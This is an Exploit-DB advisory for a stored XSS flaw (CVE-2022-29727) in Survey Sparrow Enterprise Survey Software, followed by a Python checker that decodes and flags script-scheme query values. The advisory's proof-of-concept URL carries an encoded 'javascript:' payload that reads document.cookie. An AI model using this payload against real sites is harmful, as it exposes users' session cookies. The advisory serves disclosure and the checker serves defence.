Survey Sparrow Enterprise Survey Software 2022 – Stored Cross-Site Scripting (XSS)

  • Author: Pankaj Kumar Thakur
    Date: 2022-05-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50937/
  • # Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
    # Date: May 11 2022
    # Exploit Author: Pankaj Kumar Thakur
    # Vendor Homepage: https://surveysparrow.com/
    # Software Link: https://surveysparrow.com/enterprise-survey-software/
    # Version: 2022
    # Tested on: Windows
    # CVE : CVE-2022-29727
    # References:
    https://www.tenable.com/cve/CVE-2022-29727
    https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022
    
    #POC
    
    For Stored XSS
    
    Visit
    https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
    
    XSS Executed
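
A defender-side check for the encoding layers visible in the PoC URL above (an added example, not part of the original advisory or the vendor's code): it decodes each query parameter until the value is stable, drops separator characters, and flags values that resolve to a script scheme. The function names, the stripped-character set and the two benign sample URLs are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit, unquote

# Characters stripped before the scheme test: ASCII control/space plus the
# Unicode line and paragraph separators (U+2029 is the %E2%80%A9 in the PoC).
# This set is an assumption chosen for the example, not a browser specification.
_IGNORED = re.compile(r"[\x00-\x20\u2028\u2029]")
_SCRIPT_SCHEME = re.compile(r"^(?:javascript|vbscript|data):", re.IGNORECASE)


def normalize(value, max_rounds=5):
    """Percent-decode and HTML-entity-decode repeatedly until the value is stable."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(url):
    """Return the query parameter names whose decoded value starts with a script scheme."""
    hits = []
    # Split on "&" only, so the ";" inside an entity such as &colon; stays in the value.
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        value = _IGNORED.sub("", normalize(raw))
        if _SCRIPT_SCHEME.match(value):
            hits.append(unquote(name))
    return hits


# The first entry is the request from the PoC above; the others are constructed.
SAMPLES = [
    "https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//",
    "https://LOCALHOST/login?next=%2Fdashboard&lang=en",
    "https://LOCALHOST/login?test=javascript-tutorial",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(suspicious_params(url) or "clean", url)
```

A single decoding pass leaves `%2F%2F` and the entity partly intact, which is why the loop runs until the value stops changing.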